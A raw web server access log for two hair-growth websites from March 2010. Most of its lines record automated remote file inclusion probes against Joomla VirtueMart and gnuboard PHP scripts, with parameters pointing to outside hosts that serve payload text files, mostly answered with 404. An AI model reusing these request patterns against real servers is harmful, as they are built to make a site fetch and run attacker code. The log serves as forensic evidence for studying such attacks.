216.129.119.41 - - [01/Mar/2010:09:28:54 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12589 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:09:30:04 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:30:04 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:30:09 -0800] "GET /logs/access_091207.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [01/Mar/2010:09:32:02 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [01/Mar/2010:09:32:02 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [01/Mar/2010:09:32:02 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:09:36:02 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:36:02 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:36:02 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:38:19 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:38:19 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:38:19 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.24 - - [01/Mar/2010:09:43:07 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [01/Mar/2010:09:43:08 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [01/Mar/2010:09:43:08 -0800] "GET /logs/access.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:09:43:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:43:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:43:29 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:46:18 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [01/Mar/2010:09:46:38 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [01/Mar/2010:09:46:38 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [01/Mar/2010:09:46:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:47:03 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:47:03 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:47:04 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:48:17 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [01/Mar/2010:09:49:01 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [01/Mar/2010:09:49:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:09:49:06 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [01/Mar/2010:09:49:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [01/Mar/2010:09:49:11 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [01/Mar/2010:09:49:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:18 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:18 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:22 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:32 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:32 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:32 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [01/Mar/2010:09:49:35 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.101.234.148 - - [01/Mar/2010:09:49:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
75.101.234.148 - - [01/Mar/2010:09:49:40 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6131 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
67.195.115.152 - - [01/Mar/2010:09:50:30 -0800] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:09:50:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:09:50:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:09:50:39 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:09:50:42 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [01/Mar/2010:09:50:42 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:09:50:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:09:50:52 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
165.132.30.11 - - [01/Mar/2010:09:50:52 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [01/Mar/2010:09:51:05 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [01/Mar/2010:09:51:05 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [01/Mar/2010:09:51:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [01/Mar/2010:09:51:09 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [01/Mar/2010:09:53:15 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [01/Mar/2010:09:53:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [01/Mar/2010:09:53:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:09:54:42 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:09:54:42 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:09:54:42 -0800] "GET /logs/access.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:09:54:56 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:55:13 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:09:55:13 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:09:55:13 -0800] "GET /logs/access.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:09:55:17 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:09:55:17 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:09:55:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:09:55:30 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:09:55:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [01/Mar/2010:09:56:56 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [01/Mar/2010:09:56:56 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [01/Mar/2010:09:56:56 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:09:57:11 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:57:11 -0800] "GET /logs/access_100125.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:57:11 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:09:57:45 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:57:47 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:57:47 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:09:57:47 -0800] "GET /logs/access_100125.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:09:57:52 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.84 - - [01/Mar/2010:09:58:21 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5385 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:10:00:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:10:00:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:10:00:19 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:10:00:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:10:00:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:10:00:19 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.248.166.73 - - [01/Mar/2010:10:02:04 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 530015 "http://uk.search.yahoo.com/search;_ylt=A0oG758q44tLST8BBDdLBQx.?p=growlong-hairfast.com&fr2=sb-top&fr=yfp-t-702&rd=r1&sao=1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 (.NET CLR 3.5.30729)" "growlonghairfast.com"
216.129.119.41 - - [01/Mar/2010:10:04:54 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12999 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [01/Mar/2010:10:08:41 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15429 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
67.195.37.99 - - [01/Mar/2010:10:09:48 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16404 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
121.101.214.54 - - [01/Mar/2010:10:10:28 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [01/Mar/2010:10:10:54 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [01/Mar/2010:10:12:16 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5528 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
66.248.166.73 - - [01/Mar/2010:10:14:12 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 (.NET CLR 3.5.30729)" "growlonghairfast.com"
66.248.166.73 - - [01/Mar/2010:10:14:24 -0800] "GET / HTTP/1.1" 200 926 "http://growlonghairfast.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 (.NET CLR 3.5.30729)" "growlonghairfast.com"
66.248.166.73 - - [01/Mar/2010:10:14:36 -0800] "GET / HTTP/1.1" 200 926 "http://growlonghairfast.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 (.NET CLR 3.5.30729)" "growlonghairfast.com"
66.248.166.73 - - [01/Mar/2010:10:14:39 -0800] "GET / HTTP/1.1" 200 926 "http://growlonghairfast.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 (.NET CLR 3.5.30729)" "growlonghairfast.com"
110.45.145.178 - - [01/Mar/2010:10:20:42 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [01/Mar/2010:10:20:42 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [01/Mar/2010:10:20:42 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.7.70 - - [01/Mar/2010:10:28:41 -0800] "GET / HTTP/1.1" 200 926 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:10:35:29 -0800] "GET /logs/access.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:10:35:32 -0800] "GET /logs/access.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.92.143.92 - - [01/Mar/2010:10:35:59 -0800] "GET /logs/access_100125.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.143.92 - - [01/Mar/2010:10:36:08 -0800] "GET /logs/access_100125.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.41 - - [01/Mar/2010:10:37:43 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14004 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
220.80.108.81 - - [01/Mar/2010:10:39:37 -0800] "GET /logs//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [01/Mar/2010:10:39:37 -0800] "GET /logs/access_100125.log//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
